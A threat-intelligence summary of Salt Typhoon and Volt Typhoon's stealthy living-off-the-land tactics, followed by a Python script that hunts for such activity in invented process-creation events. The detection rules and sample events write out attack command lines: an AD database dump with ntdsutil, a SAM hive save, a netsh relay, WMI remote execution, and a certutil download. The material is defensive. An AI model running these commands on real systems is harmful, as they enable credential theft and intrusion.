Full Report
Two major hacking groups have pushed the bureau to adapt how it responds to stealthier, more patient attacks, a top FBI official said. Source article: "China's 'Typhoons' changing the way FBI hunts sophisticated threats", first published on CyberScoop.
Analysis Summary
# Threat Actor: Salt Typhoon and Volt Typhoon
## Attribution & Identity
Both threats are attributed to sophisticated, patient Chinese state-linked hacking groups.
* **Salt Typhoon:** Identified as the group behind a massive, multi-year telecommunications hack.
* **Volt Typhoon:** Identified as a group infiltrating critical infrastructure with the intent to cause disruption if China invades Taiwan and the US intervenes.
## Activity Summary
Two major Chinese hacking groups, Salt Typhoon and Volt Typhoon, have forced the FBI to adapt its hunting methodology due to increasingly stealthy and patient attack patterns.
* **Salt Typhoon:** Responsible for a massive, long-running telecommunications hack.
* **Volt Typhoon:** Focused on prepositioning capabilities in critical infrastructure to enable future network disruption/attack.
* Both groups exhibit a shift from "noisy" rapid data theft to persistent access and stealthier infiltration.
## Tactics, Techniques & Procedures
The TTPs emphasize stealth, persistence, and avoiding traditional forensic indicators.
* Use of **“living off the land” (LotL)** techniques, utilizing legitimate tools within systems to camouflage activity.
* Focus on **persistent access**, rather than quick data exfiltration.
* Reduced reliance on dropping obvious malware or tools, resulting in fewer easily shareable Indicators of Compromise (IOCs).
* Shift in intent observed by CISA from purely espionage to **computer network attack (CNA)** and **prepositioning for disruption**.
## Targeting
The targeting indicates a focus on key infrastructure and supporting networks.
* **Sectors:** Telecommunications; critical infrastructure; organizations migrating workloads to cloud environments.
* **Geography:** United States networks are explicitly mentioned as targets for disruption (linked to potential Taiwan intervention scenario).
* **Victims:** Telecommunications networks (Salt Typhoon); critical infrastructure operators generally (Volt Typhoon). Targeting has shifted toward **cloud environments**, **edge devices** such as VPN appliances, and services delivered through **managed service providers (MSPs)**.
## Tools & Infrastructure
* **Malware families used:** Not explicitly detailed, but reliance on LotL techniques suggests reduced custom malware usage.
* **Infrastructure (C2, domains, IPs):** No specific URLs or IPs were detailed in the provided text.
## Implications
The sophisticated, patient, and stealthy operations of these groups (especially the LotL focus) complicate traditional threat hunting and indicator sharing for agencies like the FBI and CISA. There is a significant strategic shift observed from espionage towards potential pre-positioning for destructive or disruptive cyber operations.
## Mitigations
* **Proactive Hunting Posture:** Agencies must hunt "as if they’re already on the network."
* **Focus Beyond Traditional IOCs:** Because LotL tradecraft leaves few shareable indicators (no dropped malware, no dedicated tooling), detection must rest on behavioral signals: which legitimate binaries run, with what arguments, by which accounts, on which hosts.
* **Increased Visibility in New Areas:** Organizations must gain better insight into activity in cloud environments, on edge devices such as VPN appliances, and within MSP-delivered services, where logging and monitoring coverage is traditionally thin.
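The TTP section above describes LotL activity that yields few IOCs, and the mitigations call for hunting on behavior instead. The following Python script is an added example of what that looks like in practice; it is not code from the CyberScoop article, the FBI, or CISA. It runs a handful of behavioral rules over constructed Sysmon-style process-creation events, then pivots on the results to surface an account whose suspicious activity spans more than one host. The rule patterns (ntdsutil IFM dumps, netsh portproxy relays, WMI remote execution, certutil downloads, registry hive saves, encoded PowerShell) are generic LotL tradecraft chosen for illustration; the article attributes no specific commands to either group, and every hostname, user, IP and timestamp in the sample is invented.

```python
"""Behavioral hunt for living-off-the-land (LotL) activity in process-creation
events. Added example for this summary; not code from the CyberScoop article,
the FBI or CISA. Event format, hosts, users, IPs and command lines are
constructed for the example."""
import json
from collections import defaultdict

# Rule = (name, image basename, substrings that must ALL occur in the lowercased
# command line). Generic LotL patterns chosen for illustration only; the article
# attributes no specific commands to Salt Typhoon or Volt Typhoon.
LOTL_RULES = [
    ("ntdsutil_ad_dump",   "ntdsutil.exe",   ["ntds", "ifm"]),
    ("netsh_portproxy",    "netsh.exe",      ["portproxy", "add"]),
    ("wmic_remote_exec",   "wmic.exe",       ["process", "call", "create"]),
    ("certutil_download",  "certutil.exe",   ["-urlcache"]),
    ("reg_hive_save",      "reg.exe",        ["save", "hklm\\sam"]),
    ("powershell_encoded", "powershell.exe", ["-enc"]),
]

# Constructed sample: one JSON object per line, Sysmon-like fields. Nothing here
# is real telemetry. Lines 1, 3, 5 and 6 should fire; the rest are benign noise.
SAMPLE_EVENTS = r"""
{"ts":"2024-03-01T02:11:05Z","host":"dc01","user":"CORP\\svc_backup","image":"C:\\Windows\\System32\\ntdsutil.exe","cmdline":"ntdsutil.exe \"ac i ntds\" ifm \"create full C:\\temp\\o\" q q"}
{"ts":"2024-03-01T08:02:41Z","host":"ws-042","user":"CORP\\jdoe","image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","cmdline":"chrome.exe --profile-directory=Default"}
{"ts":"2024-03-01T09:17:09Z","host":"fw-jump","user":"CORP\\admin","image":"C:\\Windows\\System32\\netsh.exe","cmdline":"netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.5.7 connectport=443"}
{"ts":"2024-03-01T09:20:33Z","host":"ws-042","user":"CORP\\jdoe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -NoProfile -Command Get-Process"}
{"ts":"2024-03-02T01:44:12Z","host":"ws-017","user":"CORP\\svc_backup","image":"C:\\Windows\\System32\\wbem\\wmic.exe","cmdline":"wmic /node:10.0.3.12 process call create \"cmd /c whoami\""}
{"ts":"2024-03-02T01:46:58Z","host":"ws-017","user":"CORP\\svc_backup","image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil -urlcache -split -f http://10.0.9.9/a.txt C:\\Users\\Public\\a.txt"}
{"ts":"2024-03-02T10:05:00Z","host":"ws-099","user":"CORP\\build","image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil -hashfile setup.exe SHA256"}
{"ts":"2024-03-02T10:06:10Z","host":"ws-042","user":"CORP\\jdoe","image":"C:\\Windows\\explorer.exe","cmdline":"explorer.exe"}
"""


def parse_events(text):
    """Parse JSON-lines process-creation events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def image_name(path):
    """Basename of a Windows image path, lowercased, so rules key on the binary."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_rules(event):
    """Names of LOTL_RULES matched by a single event (empty list if benign)."""
    name = image_name(event["image"])
    cmd = event["cmdline"].lower()
    return [rule for rule, img, needles in LOTL_RULES
            if img == name and all(n in cmd for n in needles)]


def hunt(text):
    """Run every event through the rules; one finding per (event, rule) match."""
    findings = []
    for ev in parse_events(text):
        for rule in match_rules(ev):
            findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                             "rule": rule, "cmdline": ev["cmdline"]})
    return findings


def hits_per_host(findings):
    """Count of rule hits per host, a crude triage priority."""
    counts = defaultdict(int)
    for f in findings:
        counts[f["host"]] += 1
    return dict(counts)


def pivot_users(findings):
    """Accounts whose LotL hits span more than one host: lateral-movement candidates.
    This is the kind of second-order signal that survives when no IOC exists."""
    hosts = defaultdict(set)
    for f in findings:
        hosts[f["user"]].add(f["host"])
    return {user: sorted(h) for user, h in hosts.items() if len(h) > 1}


if __name__ == "__main__":
    results = hunt(SAMPLE_EVENTS)
    for f in results:
        print(f"{f['ts']} {f['host']:8} {f['user']:18} {f['rule']:19} {f['cmdline']}")
    print("hits per host:", hits_per_host(results))
    print("accounts active across hosts:", pivot_users(results))
```

Note that the benign `certutil -hashfile` and the unencoded PowerShell invocation do not fire: rules key on the argument pattern, not merely on the presence of a dual-use binary, which is what keeps this kind of hunt usable at fleet scale. In production the same logic would run against an EDR or SIEM process-creation feed rather than an inline sample, and the pivot on accounts would be extended to source IPs and logon sessions.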